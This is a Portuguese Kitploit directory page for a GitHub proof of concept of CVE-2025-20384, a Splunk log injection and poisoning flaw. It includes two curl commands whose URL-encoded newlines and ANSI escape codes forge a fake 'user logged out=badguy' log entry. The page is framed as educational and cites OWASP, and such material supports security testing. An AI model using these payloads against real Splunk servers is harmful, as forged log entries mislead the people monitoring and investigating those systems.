Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-20384 — Prova de conceito demonstrando injeção e envenenamento de logs no Splunk por meio de parâmetros de URL manipulados, destacando os riscos de injeção de logs OWASP. | Kitploit
Ferramentas/GitHubGitHub/axselll/cve-2025-20384
Análise de VulnerabilidadesExploraçãoSegurança WebTestes de PenetraçãoAprendizado e EducaçãoAnálise de Logs
GitHubaxselll/cve-2025-20384

CVE-2025-20384

Prova de conceito demonstrando injeção e envenenamento de logs no Splunk por meio de parâmetros de URL manipulados, destacando os riscos de injeção de logs OWASP.

Ver Repositório
8há 9 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

SPLUNK CVE-2025-20384

não sei, só li umas coisas que meu amigo me mandou e comecei a digitar um código javascript aleatório e ruim

POC do tipo Injeção/Falsificação/Envenenamento/Ofuscação de Log

Por favor, leia este artigo OWASP Log Injection

TL;DR

  • Procure um arquivo estático, passe-o e anexe algum parâmetro aleatório

  • Então, eu passo curl -k "https://localhost:8000/en-US/static/app/search/application.css%0Atest%0A%0A%0AWARN%3A%20User%20logged%20out%3Dbadguy%0A----LOG_INJECTION_TEST_12345----" OU curl -k "https://localhost:8000/en-US/static/app/search/application.css%1B[31mANSI_TEST_RED%1B[0m%0Atest%0A%0A%0AWARN%3A%20User%20logged%20out%3Dbadguy%0A----LOG_INJECTION_TEST_12345----"

  • Se você vir alguma quebra de linha aleatória que aparece, isso é envenenamento, pode parecer inofensivo porque é apenas um envenenamento "normal", mas pode ser irritante se for fortemente direcionado.

Ref

Link para o registro CVE

Baixar ferramenta